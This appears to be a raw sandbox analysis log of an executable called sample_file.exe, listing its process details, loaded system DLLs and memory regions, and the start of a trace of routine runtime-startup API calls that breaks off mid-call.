# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 15.08.2018 03:27:20.479 Process: id = "1" image_name = "sample_file.exe" filename = "c:\\users\\eebsym5\\desktop\\sample_file.exe" page_root = "0x7ea16560" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 139 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 140 start_va = 0x11c0000 end_va = 0x120ffff entry_point = 0x11c0000 region_type = mapped_file name = "sample_file.exe" filename = "\\Users\\EEBsYm5\\Desktop\\sample_file.exe" (normalized: "c:\\users\\eebsym5\\desktop\\sample_file.exe") Region: id = 141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 144 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 146 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 147 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 148 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 150 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 151 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 152 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 153 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 154 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 155 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 156 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 157 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 158 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 159 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 160 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 161 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 162 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 163 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 164 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 165 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 166 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 167 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 168 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 169 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 170 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 171 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 172 start_va = 0x1210000 end_va = 0x1e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 173 start_va = 0x71f10000 end_va = 0x71f12fff entry_point = 0x71f10000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 174 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 175 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 176 start_va = 0x660000 end_va = 0x92efff entry_point = 0x660000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 177 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 178 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 179 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 180 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 181 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 182 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 183 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 184 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 185 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 186 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 187 start_va = 0x2b0000 end_va = 0x2b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 188 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 189 start_va = 0x2d0000 end_va = 0x326fff entry_point = 0x2d0000 region_type = mapped_file name = "ntdll.dll.mui" filename = "\\Windows\\System32\\en-US\\ntdll.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ntdll.dll.mui") Region: id = 190 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 191 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 192 start_va = 0x930000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 193 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 194 start_va = 0x950000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 195 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 196 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 197 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 198 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 199 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 200 start_va = 0x990000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 201 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 202 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 203 start_va = 0x570000 end_va = 0x64efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 204 start_va = 0xcc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 205 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 206 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 207 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 208 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 209 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 210 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 211 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 212 start_va = 0x930000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 213 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 214 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 215 start_va = 0x940000 end_va = 0x943fff entry_point = 0x940000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 216 start_va = 0x950000 end_va = 0x96efff entry_point = 0x950000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 217 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 218 start_va = 0x980000 end_va = 0x983fff entry_point = 0x980000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 219 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 220 start_va = 0xae0000 end_va = 0xb0ffff entry_point = 0xae0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 221 start_va = 0xb10000 end_va = 0xb75fff entry_point = 0xb10000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 222 start_va = 0xb80000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 223 start_va = 0xd00000 end_va = 0x10f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 224 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 225 start_va = 0x1e70000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 226 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 227 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 228 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 229 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 485 start_va = 0x1fb0000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 486 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 487 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 488 start_va = 0x70550000 end_va = 0x70555fff entry_point = 0x70550000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 489 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 500 start_va = 0x990000 end_va = 0x990fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 501 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Thread: id = 1 os_tid = 0xa80 [0037.858] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfaac | out: lpSystemTimeAsFileTime=0x1cfaac*(dwLowDateTime=0xf47e95f0, dwHighDateTime=0x1d43447)) [0037.858] GetCurrentThreadId () returned 0xa80 [0037.858] GetCurrentProcessId () returned 0xa7c [0037.858] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfaa4 | out: lpPerformanceCount=0x1cfaa4*=11782336506) returned 1 [0037.858] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.859] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.859] GetLastError () returned 0x57 [0037.859] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.859] GetLastError () returned 0x57 [0037.859] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76910000 [0037.860] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x76963879 [0037.860] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.860] GetLastError () returned 0x57 [0037.860] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0037.860] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0037.861] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.861] GetLastError () returned 0x57 [0037.861] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x71f10000 [0037.864] GetProcAddress (hModule=0x71f10000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0037.865] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.865] GetLastError () returned 0x57 [0037.865] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0037.865] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.865] GetLastError () returned 0x57 [0037.865] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76910000 [0037.865] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0037.865] GetLastError () returned 0x57 [0037.865] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0037.866] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0037.866] SetLastError (dwErrCode=0x57) [0037.868] GetStartupInfoW (in: lpStartupInfo=0x1cf9e0 | out: lpStartupInfo=0x1cf9e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x11e4e00, hStdOutput=0x4ade2a07, hStdError=0xfffffffe)) [0037.868] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0037.868] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.868] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0037.868] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe\" " [0037.868] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe\" " [0037.868] GetLastError () returned 0x57 [0037.868] SetLastError (dwErrCode=0x57) [0037.868] GetLastError () returned 0x57 [0037.868] SetLastError (dwErrCode=0x57) [0037.868] GetACP () returned 0x4e4 [0037.868] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.868] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cfa10 | out: lpCPInfo=0x1cfa10) returned 1 [0037.868] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf2d8 | out: lpCPInfo=0x1cf2d8) returned 1 [0037.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.869] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x1cf078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ떘ĞĀ") returned 256 [0037.869] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ떘ĞĀ", cchSrc=256, lpCharType=0x1cf2ec | out: lpCharType=0x1cf2ec) returned 1 [0037.869] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.869] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x1cf028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ镙ĞĀ") returned 256 [0037.869] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0037.869] GetLastError () returned 0x57 [0037.869] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0037.870] GetProcAddress (hModule=0x76910000, 